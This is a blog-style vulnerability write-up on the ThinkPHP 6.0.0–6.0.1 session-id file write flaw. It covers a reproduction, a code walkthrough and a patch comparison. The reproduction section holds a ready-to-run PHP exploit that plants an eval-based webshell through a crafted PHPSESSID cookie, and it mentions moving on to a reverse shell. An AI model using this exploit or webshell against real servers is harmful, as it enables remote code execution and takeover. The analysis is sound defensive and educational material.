thinkphp 6.x arbitrary file write vulnerability
2022-08-07 09:24:00 【Aiwin-Lau】
Foreword
ThinkPHP v6.0.0~6.0.1 has an arbitrary file operation vulnerability. The root cause is that the session id supplied by the client is used, unchecked, as the name of the file the session data is written to when the session is saved. The patch verifies that the incoming $sessionId consists only of letters and digits (on top of the existing 32-character length requirement).
I. Reproduction
Add a deliberately vulnerable action to the back-end controller, reachable at index/vuln:

    use think\Request;
    use think\Session;

    // Deliberately vulnerable: attacker-controlled input is written straight into the session,
    // which is later persisted to a file named after the client's PHPSESSID cookie
    public function vuln(Request $request, Session $session)
    {
        $param = $request->get('param');
        $session->set('session_key', $param);
        return "success";
    }

Visit index/vuln, pass a value for param, and set the PHPSESSID cookie to the 32-character file name that should be written:

Pass a PHP webshell as the param value, then try to connect to the written file with AntSword:


From the webshell you can then spawn a reverse shell and take full control of the target machine.
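The request described above, as an added example that is not part of the original post: it pads a base name so the PHPSESSID is exactly 32 characters (the only constraint the vulnerable version enforces), URL-encodes the webshell into the param query parameter, and sends the GET to index/vuln. The base URL, the base name "shell" and the eval-based one-liner are assumptions chosen for the demonstration; the session store writes the serialized session array, so the shell ends up embedded in serialized text, but PHP still executes the `<?php ... ?>` block when the file is parsed.

```php
<?php
// Added example (not from the original post or from ThinkPHP).
// Assumptions: target base URL, base file name and webshell body are placeholders.

// Pad $baseName with 'a' so that name + extension is exactly 32 characters,
// since setId() in 6.0.0~6.0.1 only accepts ids of that length.
function buildSessionId(string $baseName, string $extension = '.php'): string
{
    $targetLen = 32 - strlen($extension);
    if (strlen($baseName) > $targetLen) {
        throw new InvalidArgumentException('base name too long for a 32-character session id');
    }
    return str_pad($baseName, $targetLen, 'a') . $extension;
}

// Build the URL for the vulnerable action with the payload in the param query parameter.
function buildRequestUrl(string $baseUrl, string $payload): string
{
    return rtrim($baseUrl, '/') . '/index/vuln?' . http_build_query(['param' => $payload]);
}

// Send the request with the crafted PHPSESSID cookie; returns the URL, status line and body.
function sendExploit(string $baseUrl, string $sessionId, string $payload): array
{
    $url = buildRequestUrl($baseUrl, $payload);
    $ctx = stream_context_create([
        'http' => [
            'method'        => 'GET',
            'header'        => "Cookie: PHPSESSID={$sessionId}\r\n",
            'ignore_errors' => true, // keep the body even on non-2xx responses
        ],
    ]);
    $body = @file_get_contents($url, false, $ctx);
    // $http_response_header is populated by file_get_contents in this scope when a response arrives
    $status = $http_response_header[0] ?? 'no response';
    return ['url' => $url, 'status' => $status, 'body' => $body];
}

// hypothetical target and payload; the one-liner is the kind of shell AntSword connects to
$sessionId = buildSessionId('shell');            // shellaaaaaaaaaaaaaaaaaaaaaaa.php (32 chars)
$payload   = '<?php eval($_POST["cmd"]); ?>';
$result    = sendExploit('http://127.0.0.1:8000', $sessionId, $payload);

printf("session id: %s\nrequest:    %s\nstatus:     %s\n", $sessionId, $result['url'], $result['status']);
```

The file is written as sess_ plus the session id inside the session directory the file driver is configured with, so the AntSword connection target is that file's path as served by the web server, not /index/vuln itself.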
II. Vulnerability Analysis
The framework's session middleware first calls its handle() method to initialize the session. It obtains the cookie name through getName(), which returns the configured $cookieName (PHPSESSID by default), reads that cookie from the request, and passes the value to setId(), so $sessionId takes the raw value of the PHPSESSID cookie.

setId() imposes no restriction on $id other than that it be exactly 32 characters long; any characters, including dots and slashes, are accepted.
Finally, save() is called to persist the session data: the File driver prepends the sess_ prefix to the session id to form the file name, and writeFile() calls file_put_contents() to write the content.

$path is therefore derived from the PHPSESSID cookie value and $content is the serialized session data containing the param value, so a client that controls both the cookie and the parameter can write a file with a chosen name and chosen content. The file lands in the session directory configured for the file driver; whether it can then be reached over HTTP depends on that directory being served by the web server (or on some other way to include it).
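A reduced model of the check before and after the fix, added here as an example and not ThinkPHP's own code: vulnerableSetId() reproduces the 6.0.0~6.0.1 behaviour described above (any 32-character string is accepted as the session id), patchedSetId() adds the alphanumeric check the 6.0.2 patch introduced (ctype_alnum), and sessionFilePath() applies the sess_ prefix. The session directory constant and the uniqid()-based fallback id are stand-ins, not the framework's own path resolution or id generation. Running a few candidate ids through both shows exactly which client-supplied names reach file_put_contents().

```php
<?php
// Added example, not ThinkPHP's own code: a reduced model of the session-id check
// in 6.0.0~6.0.1 next to the 6.0.2 check, plus the sess_ file naming described above.
// SESSION_DIR and the fallback id generation are stand-ins chosen for this demonstration.

const SESSION_DIR = '/tmp/runtime/session/'; // hypothetical session directory

// 6.0.0~6.0.1 behaviour: any 32-character string is taken as the session id as-is.
function vulnerableSetId(string $id): string
{
    if (strlen($id) === 32) {
        return $id;
    }
    return md5(uniqid('', true)); // fresh id, stand-in for the framework's own generation
}

// 6.0.2 behaviour: the id must also be purely alphanumeric, so '.', '/' and '\' are rejected.
function patchedSetId(string $id): string
{
    if (strlen($id) === 32 && ctype_alnum($id)) {
        return $id;
    }
    return md5(uniqid('', true));
}

// File driver naming as described above: sess_ prefix under the session directory.
function sessionFilePath(string $id): string
{
    return SESSION_DIR . 'sess_' . $id;
}

// For each candidate id: is it accepted verbatim by each version, and where would
// the vulnerable version write the session file?
function compareCandidates(array $candidates): array
{
    $out = [];
    foreach ($candidates as $label => $id) {
        $v = vulnerableSetId($id);
        $p = patchedSetId($id);
        $out[$label] = [
            'vulnerable_accepts' => $v === $id,
            'patched_accepts'    => $p === $id,
            'vulnerable_path'    => sessionFilePath($v),
        ];
    }
    return $out;
}

// constructed candidates
$candidates = [
    'normal_md5' => md5('login'),                        // 32 hex chars, a legitimate id
    'php_name'   => str_pad('shell', 28, 'a') . '.php',  // 32 chars ending in .php
    'too_short'  => 'shell.php',                         // wrong length: both versions ignore it
    'too_long'   => str_repeat('a', 33),                 // wrong length: both versions ignore it
];

foreach (compareCandidates($candidates) as $label => $r) {
    printf(
        "%-10s vulnerable=%s patched=%s path=%s\n",
        $label,
        $r['vulnerable_accepts'] ? 'accept' : 'reject',
        $r['patched_accepts'] ? 'accept' : 'reject',
        $r['vulnerable_path']
    );
}
```

Only php_name separates the two versions: it passes the length check and is written as sess_shellaaaaaaaaaaaaaaaaaaaaaaa.php by the vulnerable code, while ctype_alnum() rejects the dot and the patched code falls back to a generated id. ctype_alnum() also rejects the empty string and, under the C locale, anything outside [A-Za-z0-9], which is what makes the file name safe to concatenate into a path.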
Reference article:ThinkPHP v6.0.0~6.0.1 Arbitrary File Operation Vulnerability Analysis | J0k3r's Blog